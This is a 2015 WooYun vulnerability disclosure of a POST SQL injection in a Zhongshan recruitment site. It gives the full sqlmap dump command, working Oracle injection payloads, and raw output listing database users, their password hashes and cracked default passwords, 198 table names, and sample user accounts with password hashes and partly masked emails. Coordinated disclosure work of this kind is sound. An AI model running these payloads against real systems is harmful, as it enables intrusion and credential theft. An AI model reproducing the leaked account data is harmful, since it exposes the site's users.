当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152059

漏洞标题:菊城人才网某处存在高危POST型SQL注射漏洞(DBA权限/大量系统管理员密码泄露/198个表/17万用户密码及邮箱泄露)

相关厂商:菊城人才网

漏洞作者: 慢慢

提交时间:2015-11-05 15:58

修复时间:2015-12-24 11:08

公开时间:2015-12-24 11:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-05: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

中山市菊城人才市场是于2003年经中山市人事局批准成立的,是中山市小榄镇政府对外的一个服务窗口,是镇属集体企业,着力解决用工和就业问题,直属小榄镇委组织人事办公室管辖。它以"为社会经济建设服务,为用人单位服务,为各类人才服务"为宗旨,向社会提供全面、高效的人才服务。
中山市菊城人才市场拥有先进、齐备的软硬件设施。市场内不但有自动化办公设备及管理系统,滚动式发布招聘信息的电子屏幕,还设置了办公室、业务室、资料室、招聘信息浏览区等,同时拥有一批熟悉业务、待人热情、尽职尽责的从业人员。主要业务包括:人才招聘、求职服务、人才推荐、网络招聘、人才测评、人才租赁、猎头、人才培训、户口托管,代办毕业生报到手续、转正定级、职称评审等业务。
中山市菊城人才市场将以服务为宗旨,以用户为中心,以创新为动力,不断拓展业务。我们将全方位、多渠道、专业化、系统化地拓展各项业务,以"为企业搜寻一流人才,为人才配备最佳岗位"为已任,整合人才资源,盘活人才存量,为推动社会经济发展作贡献。以“您找到工作是我们最大的快乐”和“您的满意是我们最大的动力”作为我们工作的座右铭。

详细说明:

地址:http://**.**.**.**:80/person/search.action

python sqlmap.py -u "http://**.**.**.**:80/person/search.action" --form --batch --random-agent -p workAreaCode3 --technique=BE -D SYSTEM -T T_P_account -CACCOUNT,PASSWORD,EMAIL --dump --threads=10


back-end DBMS: Oracle
Database: SYSTEM
+-------------+---------+
| Table | Entries |
+-------------+---------+
| T_P_ACCOUNT | 175723 |
+-------------+---------+

漏洞证明:

---
Parameter: workAreaCode3 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
current user: 'SYSTEM'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
database management system users [22]:
[*] ANONYMOUS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
database management system users password hashes:
[*] _NEXT_USER [1]:
password hash: NULL
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQ_ADMINISTRATOR_ROLE [1]:
password hash: NULL
[*] AQ_USER_ROLE [1]:
password hash: NULL
[*] AUTHENTICATEDUSER [1]:
password hash: NULL
[*] CONNECT [1]:
password hash: NULL
[*] CTXAPP [1]:
password hash: NULL
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
clear-text password: CHANGE_ON_INSTALL
[*] DBA [1]:
password hash: NULL
[*] DBSNMP [1]:
password hash: 183A988BF33F09FE
[*] DELETE_CATALOG_ROLE [1]:
password hash: NULL
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
clear-text password: DIP
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
clear-text password: DMSYS
[*] EJBCLIENT [1]:
password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
password hash: NULL
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
clear-text password: EXFSYS
[*] EXP_FULL_DATABASE [1]:
password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
password hash: NULL
[*] IMP_FULL_DATABASE [1]:
password hash: NULL
[*] JAVA_ADMIN [1]:
password hash: NULL
[*] JAVA_DEPLOY [1]:
password hash: NULL
[*] JAVADEBUGPRIV [1]:
password hash: NULL
[*] JAVAIDPRIV [1]:
password hash: NULL
[*] JAVASYSPRIV [1]:
password hash: NULL
[*] JAVAUSERPRIV [1]:
password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
password hash: NULL
[*] MDDATA [1]:
password hash: DF02A496267DEE66
clear-text password: MDDATA
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
clear-text password: MDSYS
[*] MGMT_USER [1]:
password hash: NULL
[*] MGMT_VIEW [1]:
password hash: 442167C25FAC883C
[*] OEM_ADVISOR [1]:
password hash: NULL
[*] OEM_MONITOR [1]:
password hash: NULL
[*] OLAP_DBA [1]:
password hash: NULL
[*] OLAP_USER [1]:
password hash: NULL
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
clear-text password: MANAGER
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
clear-text password: ORDPLUGINS
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
clear-text password: ORDSYS
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
clear-text password: OUTLN
[*] PUBLIC [1]:
password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
password hash: NULL
[*] RESOURCE [1]:
password hash: NULL
[*] SCHEDULER_ADMIN [1]:
password hash: NULL
[*] SCOTT [1]:
password hash: F894844C34402B67
clear-text password: TIGER
[*] SELECT_CATALOG_ROLE [1]:
password hash: NULL
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
clear-text password: SI_INFORMTN_SCHEMA
[*] SYS [1]:
password hash: 56E94F231243B89C
[*] SYSMAN [1]:
password hash: B4338BF230740CA3
[*] SYSTEM [1]:
password hash: 5216C721FAA674C6
[*] TEST [1]:
password hash: 483A017BEDCEEDA0
clear-text password: PASSWORD
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
clear-text password: TSMSYS
[*] WM_ADMIN_ROLE [1]:
password hash: NULL
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
clear-text password: WMSYS
[*] XDB [1]:
password hash: 88D8364765FCE6AF
clear-text password: CHANGE_ON_INSTALL
[*] XDBADMIN [1]:
password hash: NULL
[*] XDBWEBSERVICES [1]:
password hash: NULL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TEST
[*] TSMSYS
[*] WMSYS
[*] XDB
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: workAreaCode3 (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 7883=7883 AND '%'='
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: ahq=1&workAreaCode3=2009000100030001%' AND 6819=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(107)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (6819=6819) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(107)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND '%'='
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYSTEM
[198 tables]
+-------------------------------+
| AQ$_INTERNET_AGENTS |
| AQ$_INTERNET_AGENT_PRIVS |
| AQ$_QUEUES |
| AQ$_QUEUE_TABLES |
| AQ$_SCHEDULES |
| BASE_INFO |
| DEF$_AQCALL |
| DEF$_AQERROR |
| DEF$_CALLDEST |
| DEF$_DEFAULTDEST |
| DEF$_DESTINATION |
| DEF$_ERROR |
| DEF$_LOB |
| DEF$_ORIGIN |
| DEF$_PROPAGATOR |
| DEF$_PUSHED_TRANSACTIONS |
| DEF$_TEMP$LOB |
| HELP |
| JOBCOMPLETTER |
| JOBCOMPLETTER |
| JOBUSERLETTER |
| LOGMNRC_DBNAME_UID_MAP |
| LOGMNRC_GSII |
| LOGMNRC_GTCS |
| LOGMNRC_GTLO |
| LOGMNRP_CTAS_PART_MAP |
| LOGMNRT_MDDL$ |
| LOGMNR_AGE_SPILL$ |
| LOGMNR_ATTRCOL$ |
| LOGMNR_ATTRIBUTE$ |
| LOGMNR_CCOL$ |
| LOGMNR_CDEF$ |
| LOGMNR_COL$ |
| LOGMNR_COLTYPE$ |
| LOGMNR_DICTIONARY$ |
| LOGMNR_DICTSTATE$ |
| LOGMNR_ERROR$ |
| LOGMNR_FILTER$ |
| LOGMNR_HEADER1$ |
| LOGMNR_HEADER2$ |
| LOGMNR_ICOL$ |
| LOGMNR_IND$ |
| LOGMNR_INDCOMPART$ |
| LOGMNR_INDPART$ |
| LOGMNR_INDSUBPART$ |
| LOGMNR_LOB$ |
| LOGMNR_LOBFRAG$ |
| LOGMNR_LOG$ |
| LOGMNR_OBJ$ |
| LOGMNR_PARAMETER$ |
| LOGMNR_PROCESSED_LOG$ |
| LOGMNR_RESTART_CKPT$ |
| LOGMNR_RESTART_CKPT_TXINFO$ |
| LOGMNR_SESSION$ |
| LOGMNR_SESSION_EVOLVE$ |
| LOGMNR_SPILL$ |
| LOGMNR_TAB$ |
| LOGMNR_TABCOMPART$ |
| LOGMNR_TABPART$ |
| LOGMNR_TABSUBPART$ |
| LOGMNR_TS$ |
| LOGMNR_TYPE$ |
| LOGMNR_UID$ |
| LOGMNR_USER$ |
| LOGSTDBY$APPLY_MILESTONE |
| LOGSTDBY$APPLY_PROGRESS |
| LOGSTDBY$EVENTS |
| LOGSTDBY$HISTORY |
| LOGSTDBY$PARAMETERS |
| LOGSTDBY$PLSQL |
| LOGSTDBY$SCN |
| LOGSTDBY$SKIP |
| LOGSTDBY$SKIP_SUPPORT |
| LOGSTDBY$SKIP_TRANSACTION |
| MVIEW$_ADV_AJG |
| MVIEW$_ADV_BASETABLE |
| MVIEW$_ADV_CLIQUE |
| MVIEW$_ADV_ELIGIBLE |
| MVIEW$_ADV_EXCEPTIONS |
| MVIEW$_ADV_FILTER |
| MVIEW$_ADV_FILTERINSTANCE |
| MVIEW$_ADV_FJG |
| MVIEW$_ADV_GC |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_INFO |
| MVIEW$_ADV_JOURNAL |
| MVIEW$_ADV_LEVEL |
| MVIEW$_ADV_LOG |
| MVIEW$_ADV_OUTPUT |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARAMETERS |
| MVIEW$_ADV_PARTITION |
| MVIEW$_ADV_PLAN |
| MVIEW$_ADV_PRETTY |
| MVIEW$_ADV_ROLLUP |
| MVIEW$_ADV_SQLDEPEND |
| MVIEW$_ADV_TEMP |
| MVIEW$_ADV_WORKLOAD |
| OL$ |
| OL$HINTS |
| OL$NODES |
| PLAN_TABLE |
| REPCAT$_AUDIT_ATTRIBUTE |
| REPCAT$_AUDIT_COLUMN |
| REPCAT$_COLUMN_GROUP |
| REPCAT$_CONFLICT |
| REPCAT$_DDL |
| REPCAT$_EXCEPTIONS |
| REPCAT$_EXTENSION |
| REPCAT$_FLAVORS |
| REPCAT$_FLAVOR_OBJECTS |
| REPCAT$_GENERATED |
| REPCAT$_GROUPED_COLUMN |
| REPCAT$_INSTANTIATION_DDL |
| REPCAT$_KEY_COLUMNS |
| REPCAT$_OBJECT_PARMS |
| REPCAT$_OBJECT_TYPES |
| REPCAT$_PARAMETER_COLUMN |
| REPCAT$_PRIORITY |
| REPCAT$_PRIORITY_GROUP |
| REPCAT$_REFRESH_TEMPLATES |
| REPCAT$_REPCAT |
| REPCAT$_REPCATLOG |
| REPCAT$_REPCOLUMN |
| REPCAT$_REPGROUP_PRIVS |
| REPCAT$_REPOBJECT |
| REPCAT$_REPPROP |
| REPCAT$_REPSCHEMA |
| REPCAT$_RESOLUTION |
| REPCAT$_RESOLUTION_METHOD |
| REPCAT$_RESOLUTION_STATISTICS |
| REPCAT$_RESOL_STATS_CONTROL |
| REPCAT$_RUNTIME_PARMS |
| REPCAT$_SITES_NEW |
| REPCAT$_SITE_OBJECTS |
| REPCAT$_SNAPGROUP |
| REPCAT$_TEMPLATE_OBJECTS |
| REPCAT$_TEMPLATE_PARMS |
| REPCAT$_TEMPLATE_REFGROUPS |
| REPCAT$_TEMPLATE_SITES |
| REPCAT$_TEMPLATE_STATUS |
| REPCAT$_TEMPLATE_TARGETS |
| REPCAT$_TEMPLATE_TYPES |
| REPCAT$_USER_AUTHORIZATIONS |
| REPCAT$_USER_PARM_VALUES |
| SQLPLUS_PRODUCT_PROFILE |
| TB_TEST |
| TEST_TB |
| TOAD_PLAN_TABLE |
| T_AD_ADVERT |
| T_AD_AREA |
| T_E_DEPARTMENT |
| T_E_ENTERPRISE |
| T_E_FAVORITE |
| T_E_INTERVIEW |
| T_E_JOB |
| T_E_JOB_LOCATION |
| T_E_JOB_TYPE |
| T_E_MEMBER |
| T_E_MESSAGE |
| T_E_READ_PERSON_INFO |
| T_E_SEARCH |
| T_E_SEARCH_FUNC |
| T_E_SEEN |
| T_E_VIEW_LOG |
| T_P_ACCOUNT |
| T_P_APPLY_POSITION |
| T_P_BASE_INFO |
| T_P_CERTIFICATE |
| T_P_CONTACT |
| T_P_EDUCATE_TRAIN |
| T_P_FEEDBACK |
| T_P_FLAG |
| T_P_HOPE_AREA |
| T_P_HOPE_POSITION |
| T_P_HOPE_TRADE |
| T_P_HOUSE_KEEPING |
| T_P_POSITION_FAVORITE |
| T_P_SEARCHER |
| T_P_WORK_EXPERIENCE |
| T_S_APPOINTMENT |
| T_S_AUTHORITY |
| T_S_DICT |
| T_S_DOWNLOAD |
| T_S_DOWNLOAD_TYPE |
| T_S_HOUSEKEEPING_APPLY |
| T_S_HOUSEKEEPING_REQUEST |
| T_S_HOUSEKEEPING_TYPE |
| T_S_INFO |
| T_S_INFO_TYPE |
| T_S_LOGS |
| T_S_MENU |
| T_S_OPERATOR |
| T_S_RECRUITMENT |
| T_S_RECRUITMENT_BOOK |
| T_S_RECRUITMENT_INFO |
| T_S_SEEN_POINT |
| T_S_SETTING |
+-------------------------------+


back-end DBMS: Oracle
Database: SYSTEM
+-------------+---------+
| Table | Entries |
+-------------+---------+
| T_P_ACCOUNT | 175723 |
+-------------+---------+


选取其中一部分进行展示:

Database: SYSTEM
Table: T_P_ACCOUNT
[20 entries]
+-------------+------------------+------------------------+
| ACCOUNT | PASSWORD | EMAIL |
+-------------+------------------+------------------------+
| liukm | 49ba59abbe56e057 | liukaimingming@**.**.**.** |
| wuyf001 | 49ba59abbe56e057 | NULL |
| ningcd | 49ba59abbe56e057 | NULL |
| 114171 | e83baa5a638e03c1 | 448049526@.com |
| wuy002 | 49ba59abbe56e057 | NULL |
| wenxf | 49ba59abbe56e057 | NULL |
| liangweizin | 5bb8b95caf0cafb3 | 414094154@**.**.**.** |
| limh | 49ba59abbe56e057 | NULL |
| tgl | 49ba59abbe56e057 | NULL |
| qtt | 49ba59abbe56e057 | NULL |
| zhangjs001 | 49ba59abbe56e057 | xinsi789@**.**.**.** |
| tangshuai | 49ba59abbe56e057 | NULL |
| heyl007 | 49ba59abbe56e057 | NULL |
| xuwh | 49ba59abbe56e057 | wenhong1986@QQ.com |
| mayoux | 49ba59abbe56e057 | NULL |
| huangwl | 49ba59abbe56e057 | NULL |
| liangyn | 49ba59abbe56e057 | NULL |
| yangqx | 49ba59abbe56e057 | NULL |
| alexdog | 3a24f4c037cfa13e | ruiruishaoye@**.**.**.** |
| rui2007 | 675b877702ec1d1a | cyjunely@**.**.**.** |
+-------------+------------------+------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 慢慢@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-09 11:06

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价